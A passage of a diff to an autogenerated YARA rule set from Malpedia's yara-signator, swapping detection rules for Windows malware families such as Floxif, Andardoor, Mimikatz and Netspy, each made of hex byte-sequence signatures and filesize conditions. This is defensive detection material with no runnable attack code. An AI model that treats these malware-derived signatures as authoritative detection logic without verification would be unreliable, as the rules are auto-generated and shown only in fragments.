$sequence_9 = { e8???????? 85c0 7531 488d4db0 33d2 e8???????? 85c0 } condition: - 7 of them and filesize <1933312 + 7 of them and filesize <1302528 } -rule MALPEDIA_Win_Floxif_Auto : FILE +rule MALPEDIA_Win_Classfon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dcbc6afb-5640-594e-8001-abd00982f671" + id = "68a5b428-fba0-5238-83c9-3255bfbb3ff5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.floxif_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.classfon_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "0032adeaefefb80d7e1e935d3a462c453aec0c986c2f0bdf2924a1a8da50b164" + logic_hash = "752d9b4933679b22e7a2ada3974321921c7722355427af1c70ee3b8ff2e5df5f" score = 75 quality = 75 tags = "FILE" @@ -143352,32 +146233,32 @@ rule MALPEDIA_Win_Floxif_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8945fc 837dfc02 7709 c745f401000000 eb09 8b45fc } - $sequence_1 = { 3955f4 0f83c9000000 68???????? e8???????? } - $sequence_2 = { 8b55fc c70200000000 8b45fc c7401000000000 8b45fc 8be5 } - $sequence_3 = { c645e500 c645e6e1 c645e700 c645e87d c645e973 c645ea7a c645eb30 } - $sequence_4 = { c645e500 c645e6bb c645e700 c645e828 c645e92b c645ea23 } - $sequence_5 = { 7505 e9???????? 837dd800 7406 837dd805 7502 eb92 } - $sequence_6 = { 83ec14 894df8 8b45f8 8b4808 } - $sequence_7 = { ebaa 8d4d08 e8???????? 3945fc 7526 8d4d18 e8???????? } - $sequence_8 = { 8b55fc 837a0400 7507 e8???????? eb11 8b4dfc e8???????? } - $sequence_9 = { e8???????? e8???????? 83c410 eb44 83ec10 8bcc 8d5508 } + $sequence_0 = { 85c0 7462 8b542408 8b8e00020000 8b44240c } + $sequence_1 = { 8b742418 83f8ff 898600020000 7508 5f 33c0 } + $sequence_2 = { 50 ffd3 89be04020000 8b8600020000 3bc7 740e } + $sequence_3 = { 8b1d???????? a1???????? 50 57 ff15???????? } + $sequence_4 = { 8d4c241c 8d542424 51 8b4c2414 8d442424 52 } + $sequence_5 = { 8d842430020000 50 ffd7 8d8c2430010000 51 ffd7 8b542424 } + $sequence_6 = { 6a00 6a00 6a00 6802000004 6a00 899610020000 } + $sequence_7 = { 68???????? 51 c744242802000000 c744242c2c010000 ff15???????? } + $sequence_8 = { 50 ff15???????? 8bd8 83fbff 0f849c000000 8b470c 8b5708 } + $sequence_9 = { 0f85c3000000 8b460c 85c0 0f84c0000000 03c5 } condition: - 7 of them and filesize <352256 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Andardoor_Auto : FILE +rule MALPEDIA_Win_Netspy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a2062653-6e94-5023-8019-c5f17c84046c" + id = "59f8d53f-335b-5ed2-a6be-e28bbbbbcf22" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.andardoor_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netspy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netspy_auto.yar#L1-L104" license_url = "N/A" - logic_hash = "3510472d198d8ac0d724063f8fb842ce0d2281170e5fd2c286cfefa5f50dca2c" + logic_hash = "5f6115aa578488570bf6917737e346bbf4658a865ab8c32a6d3ce07b27ad566b" score = 75 quality = 75 tags = "FILE" @@ -143391,32 +146272,30 @@ rule MALPEDIA_Win_Andardoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c8d8c2400020000 33d2 0f1f8000000000 410fb60c11 880c10 488d5201 84c9 } - $sequence_1 = { 6690 488bcb ff15???????? a810 741f 40383d???????? 0f84d0000000 } - $sequence_2 = { 48895c2458 ff15???????? 85c0 752b 488b0d???????? 4885c9 7406 } - $sequence_3 = { 4881ecf0030000 0f2970d8 0f2978c8 488b05???????? } - $sequence_4 = { 0f2970d8 0f2978c8 488b05???????? 4833c4 488985c0020000 } - $sequence_5 = { 41b880000000 e8???????? 4533c9 4c8d442430 } - $sequence_6 = { b943150000 6689742468 ff15???????? 668944246a 41b810000000 } - $sequence_7 = { 488bf8 4885c0 0f84ed000000 b943150000 6689742468 ff15???????? } - $sequence_8 = { 488bf9 33d2 33c9 498bf0 ff15???????? 85c0 7407 } - $sequence_9 = { 488bcf ff15???????? 488bf8 488d4ffe } + $sequence_0 = { 0f45c8 488b85e8330000 8908 8b15???????? 833d????????0a 0f9cc1 } + $sequence_1 = { 4989e1 4c898d905b0000 e8???????? 4829c4 488b85f81e0000 4989e1 } + $sequence_2 = { e9???????? 488b85003a0000 8b10 89d1 } + $sequence_3 = { c3 488b4df0 b810000000 e8???????? 4829c4 } + $sequence_4 = { 488b8578430000 8b00 898580430000 8b15???????? 833d????????0a 0f9cc1 } + $sequence_5 = { 4889e1 e8???????? 4829c4 488b85d8310000 4889e2 458910 } + $sequence_6 = { e8???????? 4829c4 488b8540150000 4989e1 4c898d00600000 e8???????? } + $sequence_7 = { a801 0f8515000000 65488b042560000000 488985406b0000 e9???????? 488b85406b0000 488b4018 } condition: - 7 of them and filesize <339968 + 7 of them and filesize <12033024 } -rule MALPEDIA_Win_Mrdec_Auto : FILE +rule MALPEDIA_Win_Andromut_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5cd525b0-3fcd-5de1-aa88-bd5dca592c29" + id = "dba8d7dc-66b9-5da2-b280-7c7cd5055ee5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mrdec_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.andromut_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "c22120d79fe39ae9d27a4d21c75a9bbd9a26aee0b664e8fa2f821d0411c6aa0d" + logic_hash = "97f484310b347cbce8f6e0e26b13796260e2f5f5c7183f29f706e1875ad44a4f" score = 75 quality = 75 tags = "FILE" @@ -143430,34 +146309,34 @@ rule MALPEDIA_Win_Mrdec_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c64446fa00 57 56 e8???????? 68???????? 56 e8???????? } - $sequence_1 = { 6a00 8d45cc 50 68ef000000 68???????? } - $sequence_2 = { 50 ff75f0 6a00 6a00 6a00 ff75e8 e8???????? } - $sequence_3 = { 7532 68dc050000 ff75dc 68???????? e8???????? } - $sequence_4 = { 6a00 6814010000 68???????? ff75d8 e8???????? 8d3550514000 } - $sequence_5 = { 8bec ff7508 6a40 e8???????? 0bc0 750c 68c8000000 } - $sequence_6 = { 81c700020000 68???????? 57 e8???????? 68???????? 57 e8???????? } - $sequence_7 = { 59 51 80c141 884808 ff05???????? 6a00 6a00 } - $sequence_8 = { 6a02 e8???????? 0bc0 0f8530010000 c745f000400000 ff75f0 } - $sequence_9 = { 6a00 6a00 e8???????? ff75dc e8???????? } + $sequence_0 = { 8b75f8 6bc828 8b441914 03441910 b9aacd12d8 50 56 } + $sequence_1 = { e8???????? 8d850cffffff 50 8d8574ffffff 50 8d95fcfcffff 8d8d74fcffff } + $sequence_2 = { c785fcfeffff84408441 c78500ffffff842c8415 c78504ffffff843c840d c78508ffffff841c8423 } + $sequence_3 = { e8???????? 8d8de8fcffff 51 8d8dd8faffff 51 ffd0 } + $sequence_4 = { 83c40c c745d4e278e238 c745d8de58e218 c745dcdef8dcb8 c745e0e498e0f8 } + $sequence_5 = { e9???????? 83bde4feffff06 0f85cf000000 8b85e8feffff 83f803 7524 83ef02 } + $sequence_6 = { 8bd0 51 ffb5fcfcffff 8d4dcc e8???????? 59 } + $sequence_7 = { f3ab 8b7dfc b802210000 6689443e16 0fb7443e06 } + $sequence_8 = { 53 6a0a 6a18 8d8510f4ffff c645fc02 50 e8???????? } + $sequence_9 = { 5a 84c0 745c 8d4601 894588 f7e2 0f90c1 } condition: - 7 of them and filesize <44864 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Linseningsvr_Auto : FILE +rule MALPEDIA_Win_Mimikatz_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "acba9094-ad6f-5dc3-983b-34f0b25c68ba" + id = "d4a7b901-d580-5f27-9943-deb2fd01403a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.linseningsvr_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mimikatz_auto.yar#L1-L208" license_url = "N/A" - logic_hash = "2644e1e1ca2803e3e5ff6eb23f753be414d9d9a67fa2dca1bfd8c0b76cd44619" + logic_hash = "545bdfd9bb109ef6aa7c579d3c8a6e0e694cb1fac0a4b134cb9c66bf853a0582" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -143469,32 +146348,44 @@ rule MALPEDIA_Win_Linseningsvr_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 81c4cc0d0000 c3 68ffffff7f 56 ff15???????? 83f8ff } - $sequence_1 = { 5d b801000000 5b 81c4cc0d0000 } - $sequence_2 = { 8b4c2428 6a24 8d542464 6a01 52 89442464 } - $sequence_3 = { 7e16 8b742414 8bd1 8d7c1f18 c1e902 f3a5 8bca } - $sequence_4 = { f6c202 7410 8088????????20 8a9405ecfcffff ebe3 80a0808b400000 40 } - $sequence_5 = { 0f858b030000 33c9 8acc 3ac8 } - $sequence_6 = { 55 6800010000 8d942464040000 6a01 52 e8???????? } - $sequence_7 = { 8acc 3ac8 0f857f030000 33d2 55 89542432 } - $sequence_8 = { 66895c2411 89442419 885c2418 8944241d 89442421 6689442425 88442427 } - $sequence_9 = { 7514 ff15???????? 50 68???????? e8???????? 83c408 55 } + $sequence_0 = { f7f1 85d2 7406 2bca } + $sequence_1 = { 83f8ff 750e ff15???????? c7002a000000 } + $sequence_2 = { c3 81f998000000 7410 81f996000000 7408 } + $sequence_3 = { e8???????? 894720 85c0 7413 } + $sequence_4 = { f30f6f4928 f30f7f8c24a0000000 f30f6f4138 f30f7f8424b8000000 } + $sequence_5 = { 83f812 72f1 33c0 c3 } + $sequence_6 = { ff5028 8be8 85c0 787a } + $sequence_7 = { 66894108 33c0 39410c 740b } + $sequence_8 = { eb0c bfdfff0000 6623fe 6683ef07 8b742474 } + $sequence_9 = { 6683f83f 7607 32c0 e9???????? } + $sequence_10 = { 2bc1 85c9 7403 83c008 d1e8 8d441002 } + $sequence_11 = { ff15???????? b940000000 8bd0 89442430 } + $sequence_12 = { 3c02 7207 e8???????? eb10 } + $sequence_13 = { ff15???????? b9e9fd0000 8905???????? ff15???????? } + $sequence_14 = { 8d04f530d94600 8938 68a00f0000 ff30 83c718 ff15???????? 85c0 } + $sequence_15 = { 837e1800 7402 ffd0 e8???????? 53 } + $sequence_16 = { 57 33ff ffb750da4600 ff15???????? 898750da4600 83c704 } + $sequence_17 = { e8???????? 8d04453cdb4600 8bc8 2bce 6a03 d1f9 68???????? } + $sequence_18 = { a1???????? a3???????? a1???????? c705????????cf2f4000 8935???????? } + $sequence_19 = { 8888a0d44600 40 ebe6 ff35???????? ff15???????? } + $sequence_20 = { 8a80a4d54600 08443b1d 0fb64601 47 3bf8 76ea 8b7d08 } + $sequence_21 = { 43 83c408 83fb04 7cdc 8b5df8 8ad3 } condition: - 7 of them and filesize <81360 + 7 of them and filesize <1642496 } -rule MALPEDIA_Win_Photoloader_Auto : FILE +rule MALPEDIA_Win_Furtim_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "317a851b-1405-50a0-9b40-ce8155fbfa48" + id = "ff92451b-6d4d-5ce0-b407-7dcb5e6ae2c6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.photoloader_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.furtim_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "c73e7831cd0e2d402a5233934c3321f9665203a6373de35d59f2fa5b935ee161" + logic_hash = "01fa4c0038a5d8991914e1859c3786c2de4cd564716dd7c7ecdf607d66ee4df9" score = 75 quality = 75 tags = "FILE" @@ -143508,38 +146399,32 @@ rule MALPEDIA_Win_Photoloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0d00000005 e9???????? 8bd7 397b1c 7640 } - $sequence_1 = { 8bf7 8d6f10 ff15???????? 0f31 } - $sequence_2 = { c0c003 0fb6c8 8bc1 83e10f } - $sequence_3 = { 33c9 b801000000 0fa2 89442420 895c2424 } - $sequence_4 = { 33c9 b800000040 0fa2 895f0c } - $sequence_5 = { 0fa2 894704 33c9 b800000040 } - $sequence_6 = { 895c2424 894c2428 8954242c 0f31 } - $sequence_7 = { f7411400000020 7407 8b41f8 3901 7714 } - $sequence_8 = { 85d2 7417 448bc2 0f31 48c1e220 480bc2 8801 } - $sequence_9 = { 1bc0 23442410 3b03 7418 } - $sequence_10 = { 8903 8d44242c 50 6804010000 ff15???????? ff35???????? 8d4c2430 } - $sequence_11 = { 5d c3 8b4d08 8b45fc 8901 8b450c } - $sequence_12 = { c3 55 8bec 81ec18020000 53 8ad9 } - $sequence_13 = { 8b5604 8d44240c 8b0e 55 } - $sequence_14 = { 51 8d855cffffff 8bf2 68???????? } - $sequence_15 = { 56 33c0 8d6c240c 57 } + $sequence_0 = { 5f 5e c9 c20400 6a0c 68???????? e8???????? } + $sequence_1 = { 85c0 7c28 8d45fc 50 6a04 ff15???????? } + $sequence_2 = { c7867802000020d94000 c78600050000cb224000 c786f406000032164000 c746601c724400 c7869c06000032254000 c786fc020000ca254000 } + $sequence_3 = { 59 85c0 7408 8bce ff96cc050000 5f } + $sequence_4 = { 57 8bf1 8dbeb8000000 57 c7071c010000 ff96bc030000 } + $sequence_5 = { c9 c20800 8bff 55 8bec 83ec10 ff7508 } + $sequence_6 = { 0f85e3000000 39a9c0000000 7542 0fb781cc010000 663bc5 7405 663bc3 } + $sequence_7 = { 740f 837dfc01 7509 c686c405000001 eb0e 8bce ff96f8040000 } + $sequence_8 = { c745e4e4624400 c745e8ec624400 c745ecf4624400 c745f0fc624400 c745f404634400 c745f8???????? } + $sequence_9 = { 389f94010000 7546 80bf9501000015 7535 80bf960100005d 752c 8bce } condition: - 7 of them and filesize <107520 + 7 of them and filesize <622592 } -rule MALPEDIA_Win_Ngioweb_Auto : FILE +rule MALPEDIA_Win_Contopee_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1a04caa4-5f94-5038-893b-b414574d57bc" + id = "77374f1e-6c89-5026-9b9e-741c43271a9e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ngioweb_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.contopee_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "53b049f61ecbdc954b47598eb5e1d9de9a9f52f58bb1ef6f666338c0ff24b7f4" + logic_hash = "887c3d1e6d8d0ed992ba95d9f863595a093876d8864d3c96b3a6d6d4a8e08fbb" score = 75 quality = 75 tags = "FILE" @@ -143553,32 +146438,32 @@ rule MALPEDIA_Win_Ngioweb_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4604 897808 eb15 894f08 8b06 89780c 893e } - $sequence_1 = { 394518 89b39c000000 c783a800000001000000 8983b0000000 7412 50 6884000000 } - $sequence_2 = { ffd0 85c0 7554 ff75fc 53 } - $sequence_3 = { 66c745ae6300 66c745ac5400 668975aa 66895dc4 e8???????? 33c0 } - $sequence_4 = { 668b460c 895f04 8d5f08 53 668907 ff7608 } - $sequence_5 = { 3bc7 7574 689f860100 6810270000 8d4508 50 } - $sequence_6 = { 53 8b5d24 68b9ed740a 56 e8???????? ff7518 ff7514 } - $sequence_7 = { ff75f0 ff15???????? ff15???????? 8b45e8 eb02 33c0 5f } - $sequence_8 = { 8bc3 5b 5d c21400 57 8b7c2408 85ff } - $sequence_9 = { 770b 0fb7c0 668b4445d8 668906 46 46 49 } + $sequence_0 = { c3 8bac244c020000 55 6a00 } + $sequence_1 = { 83c41c eb35 8b5614 8b442430 6a00 6aff 42 } + $sequence_2 = { 6880000000 50 8d8e6a050000 6880000000 51 } + $sequence_3 = { 66896c240c 8d842414020000 50 57 ff15???????? } + $sequence_4 = { 7510 ff15???????? 5f 5d 5b 81c4dc040000 c3 } + $sequence_5 = { 8bf8 ebc8 ff15???????? 8bf8 ebd1 5f } + $sequence_6 = { 7432 6a0f 51 50 e8???????? 8bf0 } + $sequence_7 = { 8bd8 8b4608 83f802 8b44242c 0f858e000000 eb04 8b7c2418 } + $sequence_8 = { 68???????? 51 ff15???????? 8b84243c020000 8d542428 52 50 } + $sequence_9 = { 52 e8???????? 83c430 5f 5e } condition: - 7 of them and filesize <204800 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Ceeloader_Auto : FILE +rule MALPEDIA_Win_Ismdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "385139d5-6e1c-5e2f-90c3-04a312f22353" + id = "e9177277-98bb-546b-913b-803dfeefda39" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ceeloader_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ismdoor_auto.yar#L1-L156" license_url = "N/A" - logic_hash = "5733aa6d7aff1d1a6c42de98107a30359cd04782474df0d5ddf09cf2979a826e" + logic_hash = "489ff4b41f2f5bc83c56e62265d852f18476e83488ad914ef361d6d410139690" score = 75 quality = 75 tags = "FILE" @@ -143592,32 +146477,37 @@ rule MALPEDIA_Win_Ceeloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3bce 33f6 23c7 0bda 8bde c3 0bd3 } - $sequence_1 = { 448b15???????? 4489c6 4431de 4589c3 4101f3 44891d???????? 4589c3 } - $sequence_2 = { 664589c2 664489942490030000 440fbe05???????? 4183f074 664589c2 664489942492030000 440fbe05???????? } - $sequence_3 = { 0bda 8bde 0bd3 3bce 23f3 7a04 0bda } - $sequence_4 = { 8b842420010000 3b84241c010000 0f8433000000 8b842420010000 898424dc000000 e8???????? 8b8c241c010000 } - $sequence_5 = { 3bdd 23fd 0bda 8bde 0bd3 3bce 5a } - $sequence_6 = { 741d 4885ff c6435401 488d0d53880800 480f45cf 48894b48 e8???????? } - $sequence_7 = { 88542433 0fbe05???????? 83f064 88c2 88542434 0fbe05???????? 83f076 } - $sequence_8 = { 4489a42464020000 4403bc2464020000 4489bc2460020000 448bbc2460020000 4589dc 4181e45d386101 4489a4245c020000 } - $sequence_9 = { 41c1e204 4489942448050000 44038c2448050000 44898c2444050000 448b8c2444050000 4189d2 4181e235913d02 } + $sequence_0 = { 83f8ff 7504 32c0 eb05 c0e804 2401 84c0 } + $sequence_1 = { 90 48897c2428 488d4da0 48894c2420 4c8d4d80 4c8bc3 } + $sequence_2 = { 7405 488b00 ebdd 48894500 } + $sequence_3 = { 89442420 48c7411807000000 48894110 668901 c744242001000000 } + $sequence_4 = { 7613 498d4970 418bc2 41ffc2 } + $sequence_5 = { 41ffc7 0f1f4000 418b16 488d4d38 e8???????? } + $sequence_6 = { 8bd8 33c9 ff15???????? 488bc8 } + $sequence_7 = { 488bd6 488bcf ff5030 488bc8 } + $sequence_8 = { 884c0dd8 41 83f910 7cf6 } + $sequence_9 = { 83f802 7506 c6473c00 eb04 40 } + $sequence_10 = { 8b4804 83b9ec97480000 0f94c0 8845e4 c745fc01000000 } + $sequence_11 = { c745f804000000 57 8a68fe 8d4004 8a48fb 8a78fc } + $sequence_12 = { 886dff 81e61f000080 7905 4e 83cee0 46 } + $sequence_13 = { e8???????? 83c404 c744246c0f000000 c744246800000000 c644245800 837c243c08 } + $sequence_14 = { 75f2 8b7d10 8b07 3bf0 7421 8b4f04 } condition: - 7 of them and filesize <2321408 + 7 of them and filesize <1933312 } -rule MALPEDIA_Win_Madmax_Auto : FILE +rule MALPEDIA_Win_Atmspitter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "230eedbf-6cae-5fdd-90b6-aea0b58f95e1" + id = "f9f02df1-a803-5665-939b-8200861b4172" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.madmax_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atmspitter_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "8fadf42f6b346841d23791b849b5705de38f9f89679dc44544ef7b477d437506" + logic_hash = "97d22d23e6b57a565b78835f63d6efbbbb7ac3961285afa1ce44048c0fb5a727" score = 75 quality = 75 tags = "FILE" @@ -143631,32 +146521,32 @@ rule MALPEDIA_Win_Madmax_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { d0cd 99 86d6 4c ae 2f 4e } - $sequence_1 = { b80c32e173 8ac5 08679e fb 59 8050cb80 baef812a0a } - $sequence_2 = { e07d d8cc 6a55 60 25a237f301 4a 4c } - $sequence_3 = { 8d8dd0feffff e8???????? 8db396000000 6a3b 9c f605????????d6 0f851c010000 } - $sequence_4 = { 93 9f 856d67 664c 8657b6 49 152b9be0c2 } - $sequence_5 = { d9dd 095527 17 44 4b 60 1f } - $sequence_6 = { f723 56 c8d95bcc 0e 64a04d98f5db 6e 051e079cc8 } - $sequence_7 = { ad 7ea5 6abd 650e 9c 3528e563a7 6c } - $sequence_8 = { f605????????e2 0f851d010000 73e7 f22486 85e6 210a e788 } - $sequence_9 = { f605????????a5 7531 df2e 8b1b f8 b36a 7928 } + $sequence_0 = { a900800000 7422 68???????? e8???????? 83ec24 } + $sequence_1 = { 8be5 5d c3 8b5c2420 33c0 89442450 } + $sequence_2 = { 56 89442418 e8???????? 83c40c 8bf0 8974244c } + $sequence_3 = { a4 c744241831323000 88542422 c744242800000080 89442430 } + $sequence_4 = { 8b442410 50 53 8d4c2468 68???????? 51 ff15???????? } + $sequence_5 = { c3 8b04cd14c04000 5d c3 } + $sequence_6 = { 8975e0 8db190c84000 8975e4 eb2b 8a4601 } + $sequence_7 = { 6a03 6816011200 68???????? ff15???????? 6a02 6a00 8bf8 } + $sequence_8 = { 83c404 8d442420 50 ff15???????? a900800000 7422 } + $sequence_9 = { 6a00 57 ff15???????? 6a00 8d45fc } condition: - 7 of them and filesize <3227648 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Wslink_Auto : FILE +rule MALPEDIA_Win_Zupdax_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "20de7893-0402-5999-83e1-25d8d59bd834" + id = "0a0ddf15-919a-51b3-8d2b-36d56a66b11c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wslink_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdax" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zupdax_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "8ce7768eb8de70c3eb5454e941b335f1710146a120509f2149ca4912b8c000bf" + logic_hash = "b6e9bce8da2b32bfb52c3b6477d889790098710bc4ce9f32e2c7bd1bace10557" score = 75 quality = 75 tags = "FILE" @@ -143670,32 +146560,32 @@ rule MALPEDIA_Win_Wslink_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 488bf0 4885c0 0f85ab000000 c7442420ec000000 4c8d0dcfbc0600 ba94000000 } - $sequence_1 = { e9???????? 488d15beaf0700 41b804000000 488bce e8???????? 85c0 750c } - $sequence_2 = { eb2a 8b4718 85c0 750b 488b4f08 e8???????? ffc8 } - $sequence_3 = { 48894710 4885c0 7514 c744242085010000 4c8d0d88440a00 e9???????? 8b542460 } - $sequence_4 = { e8???????? 85c0 0f848a000000 ffcf ffc3 85ff 7fd3 } - $sequence_5 = { 830f04 be01000000 488bcd e8???????? 488bcd e8???????? 488b5c2450 } - $sequence_6 = { e8???????? 85c0 0f84c9fdffff 8b8c2400010000 418bc4 85c9 0f94c0 } - $sequence_7 = { ba70000000 4c8d0d82120a00 c744242067000000 8d4a94 448d42fa e8???????? 83c8ff } - $sequence_8 = { e8???????? 85c0 0f8424feffff 488b03 4d8bcc 4d8bc7 498bd7 } - $sequence_9 = { f70300010000 7407 e8???????? eb05 e8???????? 8b5718 33c9 } + $sequence_0 = { 895e2c e8???????? 8b460c 83c404 3bc3 7419 } + $sequence_1 = { 8b4c2408 8b7e10 51 e8???????? 8b560c 52 e8???????? } + $sequence_2 = { 52 68???????? ff15???????? 8d442444 } + $sequence_3 = { e8???????? 83c408 8b4618 50 895e24 895e28 895e2c } + $sequence_4 = { 394c2414 765b 53 41 81e1ff000080 } + $sequence_5 = { 4b 81cb00ffffff 43 0fb61403 30142f 47 } + $sequence_6 = { 895710 8b4614 894e14 8b5718 894714 8b4618 895618 } + $sequence_7 = { 2bc2 50 8d54241c 52 } + $sequence_8 = { 46 8a1c06 881c01 881406 } + $sequence_9 = { 8b4c2408 8b7e10 51 e8???????? } condition: - 7 of them and filesize <2007040 + 7 of them and filesize <1032192 } -rule MALPEDIA_Win_Gibberish_Auto : FILE +rule MALPEDIA_Win_Oceansalt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "409a50f2-d1ad-54e1-a200-e21294aa9e4e" + id = "4759a01e-4dff-5857-b87f-609205da91fe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gibberish_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oceansalt_auto.yar#L1-L173" license_url = "N/A" - logic_hash = "57f29d590beea21c748ae9324417e51d5ad871133bb0f66df9972b1b6e5d5d7b" + logic_hash = "5f4a1382e32af57ddc08356072f34b4511a1cb8b2d1541817fa2debd46a6df75" score = 75 quality = 75 tags = "FILE" @@ -143709,32 +146599,38 @@ rule MALPEDIA_Win_Gibberish_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8945a4 e8???????? 8b4dac 8b45a4 6a41 } - $sequence_1 = { 8b75e8 8b7dec e9???????? f30f7e4de8 0f1045d8 eb03 } - $sequence_2 = { c1e908 894c2410 8b4c2418 3314c5e1a14700 0fb6c1 c1e908 } - $sequence_3 = { e8???????? 84c0 0f849a000000 33c0 668985dcf9ffff 8d85e8fbffff 68???????? } - $sequence_4 = { 8944243c 8b4124 89442440 8b4128 8d4c241c c744241c209d4500 c7442420d49d4500 } - $sequence_5 = { 894db0 8d4dc0 50 c745d000000000 